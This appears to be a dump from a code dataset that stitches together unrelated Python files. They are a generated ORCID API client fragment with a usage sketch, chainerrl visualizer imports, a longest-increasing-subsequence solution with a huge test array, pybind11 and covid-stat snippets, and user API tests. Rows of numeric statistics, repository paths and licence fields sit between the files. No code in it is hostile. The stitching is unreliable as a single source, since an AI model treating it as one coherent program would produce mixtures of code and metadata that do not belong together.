This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.view_works(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Works
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_works_with_http_info(orcid, **kwargs)
else:
data = self.view_works_with_http_info(orcid, **kwargs)
return data
def view_works_with_http_info(self, orcid, **kwargs):
"""
Fetch all works
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.view_works_with_http_info(orcid, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Works
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_works" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_works`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/works'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Works',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
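A minimal usage sketch for the generated client above. The package and class names (`orcid_api`, `WorksApi`) are assumptions based on typical swagger-codegen layout, not confirmed by this file; only `view_works` and its callback behavior come from the code itself.
# Hypothetical usage sketch; 'orcid_api' and 'WorksApi' are assumed names.
from pprint import pprint
import orcid_api  # assumed package name

api = orcid_api.WorksApi()  # hypothetical class exposing view_works / view_work_summary
orcid = '0000-0002-1825-0097'  # example ORCID iD

# Synchronous call: returns the deserialized Works model directly.
works = api.view_works(orcid)
pprint(works)

# Asynchronous call: passing callback= routes the request through call_api's
# thread pool; the method returns the request thread and the callback
# receives the deserialized data when the response arrives.
def on_done(response):
    pprint(response)

thread = api.view_works(orcid, callback=on_done)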
| 42.563486
| 213
| 0.559865
| 34,624
| 339,912
| 5.264528
| 0.007047
| 0.064078
| 0.022427
| 0.028835
| 0.990794
| 0.987656
| 0.984749
| 0.98081
| 0.975499
| 0.961734
| 0
| 0.002401
| 0.351932
| 339,912
| 7,985
| 214
| 42.568817
| 0.825064
| 0.281111
| 0
| 0.841098
| 1
| 0
| 0.207533
| 0.07522
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037018
| false
| 0
| 0.001763
| 0
| 0.094183
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c1d6ceae4275e728a52eec7dda1d25264d3c4e91
| 171
|
py
|
Python
|
chainerrl_visualizer/worker_jobs/__init__.py
|
Ravie403/chainerrl-visualizer
|
302bcd574d435ab68652b084764d4bb777300494
|
[
"MIT"
] | 45
|
2018-12-13T07:18:43.000Z
|
2022-03-26T15:37:27.000Z
|
chainerrl_visualizer/worker_jobs/__init__.py
|
Ravie403/chainerrl-visualizer
|
302bcd574d435ab68652b084764d4bb777300494
|
[
"MIT"
] | 12
|
2018-12-13T10:46:23.000Z
|
2021-03-08T23:39:56.000Z
|
chainerrl_visualizer/worker_jobs/__init__.py
|
Ravie403/chainerrl-visualizer
|
302bcd574d435ab68652b084764d4bb777300494
|
[
"MIT"
] | 10
|
2018-12-13T07:20:20.000Z
|
2021-12-11T14:07:56.000Z
|
from chainerrl_visualizer.worker_jobs.rollout_job import rollout # NOQA
from chainerrl_visualizer.worker_jobs.saliency_job import create_and_save_saliency_images # NOQA
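The two NOQA-tagged imports above re-export the job entry points at package level, so callers never need to know the submodule layout:
# Both names resolve at the package root thanks to the re-exports above.
from chainerrl_visualizer.worker_jobs import rollout, create_and_save_saliency_images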
| 57
| 97
| 0.883041
| 24
| 171
| 5.875
| 0.583333
| 0.184397
| 0.326241
| 0.411348
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081871
| 171
| 2
| 98
| 85.5
| 0.898089
| 0.052632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c1f85a7cc21905d82bb4406dce1623a420bb5072
| 8,802
|
py
|
Python
|
medium/Q300_LongestIncreasingSubsequence.py
|
Kaciras/leetcode
|
d203aecd1afe1af13a0384a9c657c8424aab322d
|
[
"MIT"
] | null | null | null |
medium/Q300_LongestIncreasingSubsequence.py
|
Kaciras/leetcode
|
d203aecd1afe1af13a0384a9c657c8424aab322d
|
[
"MIT"
] | null | null | null |
medium/Q300_LongestIncreasingSubsequence.py
|
Kaciras/leetcode
|
d203aecd1afe1af13a0384a9c657c8424aab322d
|
[
"MIT"
] | null | null | null |
class Solution:
def lengthOfLIS(self, nums):
"""此题关键不能陷入惯性思维,认为必须找到这个子序列,其实只需要长度相等即可"""
if len(nums) < 2:
return len(nums)
sub = [nums[0]]
def find_greater(x, lo, hi):
if lo == hi:
return lo
mid = (lo + hi) >> 1
if x > sub[mid]:
return find_greater(x, mid + 1, hi)
else:
return find_greater(x, lo, mid)
for n in nums:
if n > sub[-1]:
sub.append(n)
else:
sub[find_greater(n, 0, len(sub))] = n
return len(sub)
def lengthOfLIS_0(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if not nums:
return 0
length = [1] * len(nums)
for i, n in enumerate(nums):
k = length[i]
for j in range(i - 1, k - 2, -1):
if nums[j] < n:
length[i] = max(length[i], length[j] + 1)
return max(length)
if __name__ == '__main__':
print(Solution().lengthOfLIS([]))
print(Solution().lengthOfLIS([1, 2, 3, 4, 5, 6, 7, 8]))
print(Solution().lengthOfLIS([10, 9, 2, 5, 3, 7, 101, 18]))
print(Solution().lengthOfLIS([7, 6, 5, 4, 3, 2, 1]))
print(Solution().lengthOfLIS(
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 101, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))
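The recursive `find_greater` above is a hand-rolled lower-bound binary search over the tails array `sub`; the standard library's `bisect_left` expresses the same O(n log n) approach more directly. A minimal equivalent sketch:
from bisect import bisect_left

def length_of_lis(nums):
    # sub[i] holds the smallest possible tail of an increasing subsequence of length i + 1.
    sub = []
    for n in nums:
        i = bisect_left(sub, n)  # first index with sub[i] >= n
        if i == len(sub):
            sub.append(n)        # n extends the longest subsequence found so far
        else:
            sub[i] = n           # n gives a smaller tail for length i + 1
    return len(sub)

assert length_of_lis([10, 9, 2, 5, 3, 7, 101, 18]) == 4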
| 65.2
| 94
| 0.352988
| 2,669
| 8,802
| 1.159236
| 0.019483
| 1.614092
| 2.419198
| 3.223012
| 0.807692
| 0.807692
| 0.807692
| 0.807692
| 0.807692
| 0.807692
| 0
| 0.437974
| 0.340604
| 8,802
| 134
| 95
| 65.686567
| 0.095107
| 0.007953
| 0
| 0.697479
| 0
| 0
| 0.000918
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02521
| false
| 0
| 0
| 0
| 0.092437
| 0.042017
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
de07d147e77cb5edb2b0f2dd267fd68ccc4ad008
| 34
|
py
|
Python
|
src/utils/__init__.py
|
CS-UIT-AI-CLUB/covid-stat
|
5e1ba8049cec2d0917e736cc1c52e082669407c7
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
CS-UIT-AI-CLUB/covid-stat
|
5e1ba8049cec2d0917e736cc1c52e082669407c7
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
CS-UIT-AI-CLUB/covid-stat
|
5e1ba8049cec2d0917e736cc1c52e082669407c7
|
[
"MIT"
] | null | null | null |
from .fetch_data import fetch_data
| 34
| 34
| 0.882353
| 6
| 34
| 4.666667
| 0.666667
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
de126a04ff7ca8f0e77e73917b34a0af12024bb5
| 94
|
py
|
Python
|
13_static_cast/test.py
|
tdegeus/pybind11_examples
|
1123dff913a2f0a125eed1c1f56d60d24ed6f505
|
[
"MIT"
] | 430
|
2017-05-31T05:02:52.000Z
|
2022-03-31T09:17:20.000Z
|
13_static_cast/test.py
|
tdegeus/pybind11_examples
|
1123dff913a2f0a125eed1c1f56d60d24ed6f505
|
[
"MIT"
] | 6
|
2018-01-31T00:46:54.000Z
|
2021-08-30T07:05:25.000Z
|
13_static_cast/test.py
|
tdegeus/pybind11_examples
|
1123dff913a2f0a125eed1c1f56d60d24ed6f505
|
[
"MIT"
] | 69
|
2017-09-06T03:22:12.000Z
|
2022-03-31T09:17:21.000Z
|
import mymodule
print(mymodule.Foo().bar([1, 2, 3]))
print(mymodule.Foo().bar([1, 2, 3], 3))
| 18.8
| 39
| 0.62766
| 17
| 94
| 3.470588
| 0.470588
| 0.440678
| 0.542373
| 0.644068
| 0.745763
| 0.745763
| 0.745763
| 0
| 0
| 0
| 0
| 0.083333
| 0.106383
| 94
| 4
| 40
| 23.5
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 10
|
a9cd2c19a3fbd84944fc04e8ff8dd64534af20e9
| 7,369
|
py
|
Python
|
tests/test_resource/test_user.py
|
yhfyhf/wang_fm
|
250c053256a6337c7b07a56f4b859c648b4d9a16
|
[
"MIT"
] | 30
|
2015-01-14T16:07:44.000Z
|
2020-11-20T14:20:05.000Z
|
tests/test_resource/test_user.py
|
yhfyhf/wang_fm
|
250c053256a6337c7b07a56f4b859c648b4d9a16
|
[
"MIT"
] | 2
|
2015-04-03T01:56:29.000Z
|
2017-10-03T03:29:44.000Z
|
tests/test_resource/test_user.py
|
yhfyhf/wang_fm
|
250c053256a6337c7b07a56f4b859c648b4d9a16
|
[
"MIT"
] | 17
|
2015-01-01T07:20:28.000Z
|
2020-11-20T14:20:22.000Z
|
#!/usr/bin/env python
# encoding: utf-8
import json
from model.user import add_user, get_user, check_user_password
from model.music import add_music
from utils import BaseResourceTest
class test_user_list_resource(BaseResourceTest):
def test_get(self):
self.login_as_admin() # this will add a user name admin!
user = add_user('name1', 'pw1', 'normal')
add_user('name2', 'pw2', 'normal')
add_user('name3', 'pw3', 'normal')
add_user('name4', 'pw4', 'normal')
rv = self.app.get('/api/user/?key=' + user.key)
# print json.loads(rv.data)
assert len(json.loads(rv.data)) == 1
rv = self.app.get('/api/user/')
assert json.loads(rv.data)['count'] == 4 + 1
rv = self.app.get('/api/user/?name=name1')
assert len(json.loads(rv.data)) == 1
rv = self.app.get('/api/user/?start=0&end=2')
assert len(json.loads(rv.data)) == 2
rv = self.app.get('/api/user/?start=0')
assert len(json.loads(rv.data)) == 4 + 1
def test_post(self):
self.app.post('/api/user/',
data={'name': u'姓名',
'password': u'密码'})
self.login_as_admin()
rv = self.app.get(u'/api/user/?name=姓名')
rv = json.loads(rv.data)[0]
#print rv
assert rv['name'] == u'姓名'
assert rv['level'] == 'normal'
rv = self.app.post('/api/user/',
data={'name': u'姓名',
'password': u'密码'})
rv = json.loads(rv.data)
assert rv is None
class test_user_resource(BaseResourceTest):
def test_patch(self):
self.login_as_admin() # this will add a user name admin!
user = add_user('name1', 'pw1', 'normal')
user_key = user.key
rv = self.app.patch('/api/user/%s/' % (user_key),
data={'password': 'new_password',
'level': 'admin'})
rv = json.loads(rv.data)
assert rv['level'] == 'admin'
user = get_user(key=user_key)[0]
assert check_user_password(user, 'new_password')
def test_delete(self):
self.login_as_admin() # this will add a user name admin!
user = add_user('name1', 'pw1', 'normal')
user_key = user.key
assert len(get_user(key=user_key)) == 1
self.app.delete('/api/user/%s/' % (user_key))
assert len(get_user(key=user_key)) == 0
class test_user_current_resource(BaseResourceTest):
def test_get(self):
rv = self.app.get('/api/user/current/')
rv = json.loads(rv.data)
assert rv is None
add_user('name1', 'pw1', 'normal')
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'pw1'})
rv = self.app.get('/api/user/current/')
rv = json.loads(rv.data)
assert rv['name'] == 'name1'
assert rv['level'] == 'normal'
def test_post(self):
add_user('name1', 'pw1', 'normal')
add_user('name2', 'pw2', 'disable')
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'pw1'})
rv = json.loads(rv.data)
assert rv['name'] == 'name1'
